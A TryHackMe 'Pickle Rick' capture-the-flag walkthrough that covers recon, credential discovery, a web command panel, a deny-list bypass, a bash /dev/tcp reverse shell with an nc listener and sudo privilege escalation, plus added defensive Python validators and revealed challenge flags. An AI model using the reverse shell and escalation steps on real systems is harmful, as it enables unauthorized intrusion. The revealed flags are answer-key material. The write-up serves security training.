
TryHackMe - PickleRick




1.      The first step for any such challenge is to scan the server with nmap. I generally use the options -A and -T4, but you can also run NSE scripts alongside them by adding --script=vuln. This produces a lot of output and we have to pick the relevant information out of it, but on the plus side it sometimes hands us something valuable.




2.      Now I knew that it hosts a webpage, since port 80 is open. Then I checked its robots.txt file and found a string: Wubbalubbadubdub

At this point we don't have any information about what this string could be, so just make a note of it for now and move on.


3.      Then I checked the source code of the homepage given to us, and it contained some interesting info. It gave us a username: R1ckRul3s

At this time I had a hunch that the above string could actually be a password for something.




4.      My next step was to use dirbuster to locate hidden files and directories on the server. This led me to a login page.




5.      The next step is pretty clear: use R1ckRul3s as the username and try Wubbalubbadubdub as the password to see if we can log into the server.

To tell you the truth, I actually used hydra to brute force the password from the rockyou.txt wordlist, and after a minute it clicked that maybe that string was the password all along. And it actually was.


6.      Logged in. At this point we see a text field for entering commands, and typing ls into it made me realize that we can run Linux commands on the server directly through it.



7.      You must be thinking "easy peasy, we can just cat the file to view its contents". But nope: cat is blocked.




8.      But we do have some alternatives to cat, and less worked perfectly. So, by running the command less Sup3rS3cretPickl3Ingred.txt we get our 1st ingredient: mr. meeseek hair
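The reason the panel could be beaten with less is that it filtered on a deny-list of command names. The following is an added example (not the challenge's code) contrasting such a deny-list check with an allow-list check that never hands the string to a shell; DENY_LIST, ALLOW_LIST and the sample commands are constructed for illustration.

```python
"""Deny-list vs allow-list validation for a web command panel.

Added example, not code from the Pickle Rick box.  DENY_LIST and
ALLOW_LIST are constructed to mirror the behaviour seen on the page."""
import shlex

# Constructed deny-list: the panel rejects `cat` and nothing else.
DENY_LIST = {"cat"}

# Constructed allow-list: each permitted binary with the only arguments
# it may be given.  Anything else is refused before reaching a shell.
ALLOW_LIST = {"ls": {"-l", "-a", "-la"}, "whoami": set()}


def denylist_allows(command: str) -> bool:
    """The weak check: block a few names, pass everything else to a shell.
    Returns True when the command would be executed."""
    words = command.split()
    return bool(words) and words[0] not in DENY_LIST


def allowlist_allows(command: str) -> bool:
    """The hardened check: tokenize with shlex (no shell involved) and
    accept only a known binary with known arguments.  Metacharacters such
    as ';' or '|' stay attached to a token and therefore never match."""
    try:
        argv = shlex.split(command)
    except ValueError:          # unbalanced quotes: refuse rather than guess
        return False
    if not argv or argv[0] not in ALLOW_LIST:
        return False
    return all(arg in ALLOW_LIST[argv[0]] for arg in argv[1:])


if __name__ == "__main__":
    for cmd in ("cat Sup3rS3cretPickl3Ingred.txt",
                "less Sup3rS3cretPickl3Ingred.txt", "ls -la"):
        print(f"{cmd!r}: deny-list={denylist_allows(cmd)} "
              f"allow-list={allowlist_allows(cmd)}")
```

The deny-list lets less (and any other reader not on the list) straight through, while the allow-list refuses everything except the two commands the panel is meant to offer.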


9.      Since I effectively had shell access to the server, I started to look around in the home folder.


10.  Just like before, I used less to open this file and found our 2nd ingredient: 1 jerry tear




11.  After this step I realized that maybe I'm not logged in as the root user. So I checked with the whoami command, and I actually was the www-data user.

12.  At this point the only thing on my mind was privilege escalation. So I checked which commands I was allowed to run with sudo. The command I used is sudo -l




13.  The line (ALL) NOPASSWD: ALL means that I'm allowed to run any command through sudo, as any user, without being asked for a password. So I tried sudo bash to get a root shell, but that did not work from the web panel.
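The rule found in steps 12 and 13 is exactly the kind of thing a sudoers audit should catch before an attacker does. Below is an added example (not part of the original write-up) that parses `sudo -l` output and flags passwordless rules; the sample output is constructed in the shape sudo prints, and the user line is assumed since only the NOPASSWD rule appears on the page.

```python
"""Flag dangerous sudo rules in `sudo -l` output.

Added example, not part of the Pickle Rick write-up.  SAMPLE_SUDO_L is a
constructed transcript; only the `(ALL) NOPASSWD: ALL` line is from the page."""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on this host:
    env_reset, mail_badpass

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: ALL
"""

# One command rule per line: "(runas) [NOPASSWD:|PASSWD:] command spec".
RULE = re.compile(r"^\s*\(([^)]*)\)\s*(?:(NOPASSWD|PASSWD):)?\s*(.+?)\s*$")


def parse_sudo_rules(output: str) -> list:
    """Return a dict per rule: runas spec, whether no password is needed,
    and the command spec.  Header lines do not match and are skipped."""
    rules = []
    for line in output.splitlines():
        m = RULE.match(line)
        if m:
            runas, tag, cmd = m.groups()
            rules.append({"runas": runas, "nopasswd": tag == "NOPASSWD", "cmd": cmd})
    return rules


def risky_rules(output: str) -> list:
    """Findings for rules that give the account a passwordless sudo path.
    `NOPASSWD: ALL` is the full root compromise used on the page; any other
    NOPASSWD rule still deserves review of the listed binary."""
    findings = []
    for r in parse_sudo_rules(output):
        if r["nopasswd"] and r["cmd"] == "ALL":
            findings.append(f"({r['runas']}) NOPASSWD: ALL -> passwordless root")
        elif r["nopasswd"]:
            findings.append(f"({r['runas']}) NOPASSWD: {r['cmd']} -> review binary")
    return findings


if __name__ == "__main__":
    # The fix is to delete the rule or scope it to specific binaries that
    # cannot spawn a shell; a web server account should normally have none.
    for finding in risky_rules(SAMPLE_SUDO_L):
        print(finding)
```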

14.  The next thing I had in mind was to try this again, but from a terminal this time. So I used a reverse shell to get a shell in my terminal. For this I went to GTFOBins (gtfobins.github.io), searched for bash → reverse shell, and found the following command, which I modified for my use case:

bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'

so this became

bash -c 'exec bash -i &>/dev/tcp/<my_ip_address>/12345 <&1'


15.  Then I started a listener on port 12345 in a terminal window with the following command: nc -lvnp 12345

16.  Finally I ran the reverse shell command on the site. And voilà, I got a shell in the terminal.




17.  Then I ran sudo bash and finally got root access on the system. At the end of this challenge I looked into the root folder and printed the only file there, which gives us our 3rd ingredient: fleeb juice


